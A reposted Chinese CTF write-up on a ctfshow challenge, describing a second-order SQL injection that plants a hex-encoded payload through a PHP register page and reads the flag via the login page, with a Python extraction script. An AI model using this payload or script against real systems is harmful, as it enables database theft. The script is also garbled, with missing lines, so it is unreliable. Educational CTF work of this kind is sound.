我的编程空间,编程开发者的网络收藏夹
学习永远不晚

ctfshow-内部赛-签到

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

ctfshow-内部赛-签到

内部赛-签到

信息收集

​ 注册登录,无收获,扫目录,出源码,代码审计。

代码审计

​ 有三个界面,login.phpregister.phpuser.php,首先关注到的是,SQL语句,发现有两处

$sql ="select username from test1 where email='$e' and password='$p'";

$sql ="insert into test1 set email = '$e', username = '$u',password = '$p'";

可以看到通过email和password选出username,而username是唯一的回显位,那么大概率从此处入手。

解题

​ 如何构造注入。我们需要用到两处地方,即两次对数据库操作的地方,一处用于插入payload,在register.php,一处用于执行payload,在login.php,而且只有login.php有强过滤,在register出可以使用union select,还需要注意一点,在user.php中使用了is_numberic()函数对回显username进行了过滤,只能显示数字,但是没关系,这里通过hex编码绕过,可以查一下,该函数对16进制的字符串当作数字处理。

代码审懂了,但是脚本编写能力确实还欠佳,参考了一下别的师傅的代码,做了一点修改,直接可以跑出答案

代码解读:
为什么不直接选出答案,而是通过循环加substr,因为回显username有字数限制,也可以稍微改大一点,可以加快flag的产生

构造出来的SQL:在username处找flag,至于爆表爆字段改一改就行了,这里很巧妙,通过两段插入点,使用内联注释还有一个注意点,原来的insert的语句使用了换行符,所以p是会被赋值,而不会被#注释掉

insert into test1 set email = '1', username = hex(hex(substr((selectflagfromflag)from1for1))),#',password = '1'
import requestsimport reurl1 = "http://7580c911-e3e6-47eb-8ca8-83252f9038aa.challenge.ctf.show/register.php"url2 = "http://7580c911-e3e6-47eb-8ca8-83252f9038aa.challenge.ctf.show/login.php"flag = ''for i in range(1, 50):    payload = "hex(hex(substr((selectflagfromflag)from" + str(i) + "for1))),#",        'p': i    }    r1 = s.post(url1, data=data1)    data2 = {        'e': i,        'p': i    }    r2 = s.post(url2, data=data2)    t = r2.text    try:        real = re.findall("Hello (.*?),", t)[0]        flag += real    except IndexError:        strs=bytes.fromhex(flag)        strss=bytes.fromhex(strs.decode())        print(strss.decode())        break

在这里插入图片描述

来源地址:https://blog.csdn.net/XYH_233/article/details/129865391

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

ctfshow-内部赛-签到

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

mybatis set标签内部为空怎么解决

如果MyBatis的标签内部没有任何内容,可以通过指定一个默认值来解决这个问题。例如,可以在标签内部设置一个默认值,如下所示:column_name = #{propertyName, jdbcType=VA
mybatis set标签内部为空怎么解决
2024-03-04

Android WebView拦截iframe标签内部跳转教程

最近项目里有个广告位需要动态配置,后台给了一段 html 嵌套iframe标签的代码,需要Android拦截iframe内部的跳转,自己做处理。 比如,下面是一段html代码,嵌套这iframe标签,src就是跳转地址,我现在就要当你点击该
2022-06-06

将字段添加到 MongoDB 内部对象

知识点掌握了,还需要不断练习才能熟练运用。下面编程网给大家带来一个Golang开发实战,手把手教大家学习《将字段添加到 MongoDB 内部对象》,在实现功能的过程中也带大家重新温习相关知识点,温故而知新,回头看看说不定又有不一样的感悟!问
将字段添加到 MongoDB 内部对象
2024-04-05

Java 操作Word书签(二):添加文本、图片、表格到书签内容

在Java操作Word书签(一)中介绍了给Word中的特定段落或文字添加书签、读取及删除已有书签的方法,本文将继续介绍Java 操作Word书签的方法,即如何给已有的书签添加内容,包括添加文本、图片、表格等。使用工具:Free Spire.
2023-06-02

vb中怎么将文本框内容输出到标签

要将文本框的内容输出到标签中,可以使用以下代码:```vbLabel1.Text = TextBox1.Text```其中,`Label1` 是你要输出内容的标签名称,`TextBox1` 是你要获取内容的文本框名称。使用 `TextBox
2023-10-11

Windows10内部预览版怎么升级到10240专业版?

网上盛传 Windows 10 的正式版就在这几天确定。今天收到升级 10240 的升级提示,赶紧升级安装、与君分享。1、检查升级:开始-->TokFAfQ设置-->更新和安全,可以看到有 “TH1 Professional 1
2023-06-17

怎么将内部数据绑定到Flex DataGrid组件中

这篇文章主要介绍了怎么将内部数据绑定到Flex DataGrid组件中,具有一定借鉴价值,感兴趣的朋友可以参考下,希望大家阅读完这篇文章之后大有收获,下面让小编带着大家一起了解一下。使用Flex DataGrid组件显示数据列表显示数据列表
2023-06-17

【阿里云盘】自动每日签到,无需部署,无需服务器

1、进入金山文档网页版 https://www.kdocs.cn/ 2、随便新建一个空表格,点击【效率】-【高级开发】-【AirScript脚本编辑器】 3、点击【创建脚本】-【文档共享脚本】 4、创建成功后随便命名,我这里命名为:阿里
2023-08-18

结合cpolar内网工具,实现无需部署到公网服务器

文章目录 结合cpolar内网工具,实现无需部署到公网服务器简介1. 安装Dashy2. 安装cpolar3.配置公网访问地址4. 固定域名访问 转载自cpolar极点云文章:本地Linux 部署 Dashy 并远程访问
2023-08-18

Linux 上怎么用IP转发使内部网络连接到互联网

这篇文章主要为大家分析了Linux 上怎么用IP转发使内部网络连接到互联网的相关知识点,内容详细易懂,操作细节合理,具有一定参考价值。如果感兴趣的话,不妨跟着跟随小编一起来看看,下面跟着小编一起深入学习“Linux 上怎么用IP转发使内部网
2023-06-28

如何在Linux上用IP转发使内部网络连接到互联网

本篇文章为大家展示了如何在Linux上用IP转发使内部网络连接到互联网,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。下面分享在 linux 上使用 iptables 将 ip 转发从一个网络接口转发
2023-06-28

Go ChromeDP 在打印到 pdf 期间忽略任何外部或内部 CSS,仅使用 html 文件中的 CSS

php小编柚子将为大家介绍一种名为Go ChromeDP的工具,它在将网页打印为PDF的过程中,可以忽略所有外部和内部CSS样式,只使用HTML文件中的CSS样式。这个工具可以帮助开发人员更好地控制PDF输出的样式,并且提供了更灵活的定制选
Go ChromeDP 在打印到 pdf 期间忽略任何外部或内部 CSS,仅使用 html 文件中的 CSS
2024-02-10

linux Shell脚本里面把一个数组传递到awk内部进行处理

前段时间和几位同事讨论过一个问题:Shell脚本里面怎样把一个数组传递到awk内部进行处理? 当时没有找到方法。前两天在QQ群里讨论awk的时候,无意间又聊起这个话题。机缘巧合之下找到一个思路,特此分享。 测试环境:[root]# head
2022-06-04

如何使用linuxShell脚本把一个数组传递到awk内部进行处理

如何使用linuxShell脚本把一个数组传递到awk内部进行处理,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。Shell脚本里面怎样把一个数组传递到awk内部
2023-06-09

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录